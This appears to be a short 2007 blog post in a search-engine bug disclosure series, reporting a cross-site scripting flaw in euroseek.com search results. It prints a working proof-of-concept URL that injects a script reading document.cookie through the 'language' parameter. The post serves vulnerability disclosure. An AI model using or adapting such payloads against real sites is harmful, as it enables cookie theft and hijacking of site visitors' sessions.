MOSEB-27: Vulnerability at euroseek.com

21:54 27.06.2007

Next participant of the project is Euroseek search engine. Euroseek it is regional search portal designed to find information in Europe.

The vulnerability is at Euroseek (euroseek.com) in search results. This Cross-Site Scripting hole I found 30.05.2007.

XSS:

The vulnerability is in language parameter:
http://euroseek.com/system/search.cgi?mode=internet&language=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: regional seeking can be dangerous.

Note, that Euroseek engine use Google search engine. So Google also responsible for this vulnerability.


Leave a Reply

You must be logged in to post a comment.